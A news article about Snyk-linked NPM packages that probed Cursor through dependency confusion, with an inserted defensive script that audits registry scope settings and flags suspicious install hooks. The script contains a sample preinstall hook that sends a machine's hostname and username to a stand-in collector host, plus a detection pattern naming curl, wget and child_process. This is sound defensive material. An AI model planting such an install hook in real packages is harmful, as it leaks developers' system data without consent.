SecurityWeek

Snyk Says ‘Malicious’ NPM Packages Part of Research Project

Apparently malicious NPM packages linked to Snyk raised some concerns, but the security firm clarified that it’s part of a research project.


Several apparently malicious NPM packages linked to Snyk raised some concerns, but the developer security firm said they were part of a research project and suggested that there was no risk to anyone.

SourceCodeRed researcher Paul McCarty raised the alarm last week when he spotted the packages on the NPM Registry, warning that the packages were designed to collect data about the system and send it back to the attacker. 

McCarty’s analysis revealed that the NPM packages in question had been published by someone from Snyk and that the target was the AI code editor Cursor. 

“Now, typically, when we see packages like this, they are attempting to perform a dependency confusion attack on a specific company. I don’t know if Cursor.com has a bug bounty program or a specific background,” McCarty explained. 

“The person who created these packages is probably hoping that Cursor employees accidentally install these public packages, which will send their data to the attacker-controlled web service,” he added.
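The attack McCarty describes depends on two things: a package name that the victim's build resolves from the public registry rather than an internal one, and an install-time script that runs before anyone reads the package's code. The following script is an added example, not code from the article, Snyk or SourceCodeRed; it audits a constructed package.json and .npmrc for that exposure and flags install hooks that look like a data-collecting probe. The "acme" package names, the "acme-" naming convention for unscoped internal packages, the registry hosts and the probe script are all assumptions made for the example.

```javascript
// Added example (not code from the article, Snyk or SourceCodeRed): audit an
// internal project's manifest for dependency-confusion exposure and flag
// install-time lifecycle scripts that behave like a data-collecting probe.
// Every package name, registry host and script below is constructed.

// Constructed: an internal project's package.json. "acme-" names are assumed
// to be internal-only packages that do not exist on the public registry.
const SAMPLE_PACKAGE_JSON = {
  name: "acme-ide-extension",
  scripts: { build: "tsc -p ." },
  dependencies: {
    "@acme/auth-client": "1.2.0", // scoped; scope mapped to a private registry below
    "@acme-labs/ui": "0.3.1",     // scoped, but the scope is NOT mapped: public registry
    "acme-telemetry": "^2.0.0",   // unscoped internal name: squattable on npmjs.org
    "lodash": "^4.17.21",         // genuine public package
  },
};

// Constructed: the project's .npmrc. Only the @acme scope is pinned privately.
const SAMPLE_NPMRC = `registry=https://registry.npmjs.org/
@acme:registry=https://npm.internal.acme.example/
//npm.internal.acme.example/:_authToken=\${NPM_TOKEN}
`;

// Constructed: a manifest in the style of a dependency-confusion probe. The
// preinstall hook runs on `npm install` and reports host identity to a
// collector before a developer ever opens the package.
const PROBE_MANIFEST = {
  name: "acme-telemetry",
  version: "99.0.0", // high version so resolvers that merge public and private feeds prefer it
  scripts: {
    preinstall:
      "node -e \"const o=require('os');require('https').get('https://collector.example/?h='+o.hostname()+'&u='+o.userInfo().username)\"",
  },
};

// Parse the registry lines of an .npmrc: default registry plus per-scope overrides.
function parseNpmrc(text) {
  const scopes = new Map();
  let defaultRegistry = "https://registry.npmjs.org/";
  for (const raw of text.split("\n")) {
    const line = raw.trim();
    if (!line || line.startsWith(";") || line.startsWith("#")) continue;
    const eq = line.indexOf("=");
    if (eq < 0) continue;
    const key = line.slice(0, eq).trim();
    const value = line.slice(eq + 1).trim();
    if (key === "registry") {
      defaultRegistry = value;
    } else if (key.startsWith("@") && key.endsWith(":registry")) {
      scopes.set(key.slice(0, -":registry".length), value);
    }
  }
  return { scopes, defaultRegistry };
}

const PUBLIC_REGISTRY = /registry\.npmjs\.org/;

// Report every dependency that npm would fetch from the public registry even
// though the name belongs to the organisation. `internalPrefixes` lists the
// naming conventions used for unscoped internal packages (an assumption).
function auditDependencies(pkg, npmrcText, internalPrefixes = ["acme-"]) {
  const { scopes, defaultRegistry } = parseNpmrc(npmrcText);
  const findings = [];
  const deps = { ...(pkg.dependencies || {}), ...(pkg.devDependencies || {}) };
  for (const name of Object.keys(deps)) {
    if (name.startsWith("@")) {
      const scope = name.slice(0, name.indexOf("/"));
      const registry = scopes.get(scope) || defaultRegistry;
      if (PUBLIC_REGISTRY.test(registry)) {
        findings.push({ name, reason: `scope ${scope} is not mapped to a private registry` });
      }
    } else if (internalPrefixes.some((p) => name.startsWith(p)) && PUBLIC_REGISTRY.test(defaultRegistry)) {
      findings.push({ name, reason: "unscoped internal name resolves from the public registry" });
    }
  }
  return findings;
}

// Lifecycle hooks that npm runs automatically on install; flag any that reach
// the network or read host identity, the pattern a probe package uses.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
const SUSPICIOUS = /https?:\/\/|\bcurl\b|\bwget\b|require\(['"](https?|dns|os|child_process)['"]\)|hostname\(|userInfo\(/;

function flagLifecycleScripts(pkg) {
  const scripts = pkg.scripts || {};
  return INSTALL_HOOKS.filter((h) => scripts[h] && SUSPICIOUS.test(scripts[h]))
    .map((hook) => ({ hook, script: scripts[hook] }));
}

console.log(auditDependencies(SAMPLE_PACKAGE_JSON, SAMPLE_NPMRC));
console.log(flagLifecycleScripts(PROBE_MANIFEST));
```

The fix the audit points at is the configuration one: every internal scope gets a `@scope:registry=` line in .npmrc (or the equivalent in the organisation's proxy registry), and unscoped internal names are either moved under a scope or registered on the public registry as placeholders so nobody else can. The lifecycle-script check is a triage aid for packages pulled from the public registry, not a substitute for reading them.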

The NPM packages raised some questions and concerns on social media, but Snyk assured everyone on Tuesday that the packages were not malicious.


Snyk told SecurityWeek in an emailed statement, which has also been posted in response to the social media posts, that the packages were released as part of a research project focusing on dependency confusion. 

“Snyk Research Labs regularly contributes back to the community with testing and research of common software packages,” said Snyk CTO Danny Allan. “This particular research into Cursor was not intended to be malicious and included Snyk Research Labs and the contact information of the researcher. We were very specifically looking at dependency confusion in some VS Code extensions. The packages would not be installed directly by a developer.”

Allan added, “Snyk does follow a responsible disclosure policy and while no one picked this package up, had anyone done so, we would have immediately followed up with them.”

The packages have been removed from the NPM Registry. 

Malicious NPM packages have made many headlines in recent years so it’s not surprising that Snyk’s packages raised concerns. 

Someone claiming to be a developer at Cursor said the company got an apology from Snyk after the existence of the packages came to light, but described the security firm’s actions as “irresponsible”. 


Written By

Eduard Kovacs (@EduardKovacs) is senior managing editor at SecurityWeek. He worked as a high school IT teacher before starting a career in journalism in 2011. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.
